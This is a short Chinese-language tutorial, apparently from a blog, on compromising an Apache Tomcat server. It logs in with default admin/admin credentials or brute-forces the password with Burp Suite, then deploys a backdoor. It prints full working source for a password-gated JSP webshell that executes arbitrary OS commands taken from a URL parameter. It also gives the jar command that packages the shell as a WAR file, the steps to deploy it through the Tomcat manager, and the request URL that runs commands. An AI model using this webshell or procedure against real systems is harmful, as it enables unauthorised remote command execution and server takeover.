Tomcat安裝完成後默認賬號密碼是admin,admin,很多人安裝完忘記修改導致服務器被黑;如果不是弱口令,可以使用BP進行密碼爆破。
這裏弱口令嘗試登陸進去
登陸成功!
這裏準備一下我們的後綴爲.war後門木馬文件,新建一個jsp,保存爲hellocmd.jsp,代碼如下:
<%
if("123456".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[1024];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
在kali執行:jar -cvf hello.war hellocmd.jsp 這裏生成的是一個部署文件,把剛纔的jsp文件部署到hello.war裏面。(kali執行jar需要jdk環境)
linux安裝jdk教程
成功生成,目錄下多了個hello.war的文件
來到tomcat的管理頁面,重新熱部署,上傳剛纔我們準備的war文件,點擊瀏覽選中我們的war文件,然後點擊Deploy完成部署。
管理頁面的應用中多了hello的運行項目
最後我們在瀏覽器打開鏈接
ip或者域名:8080/hello/hellocmd.jsp?pwd=123456&cmd=whoami
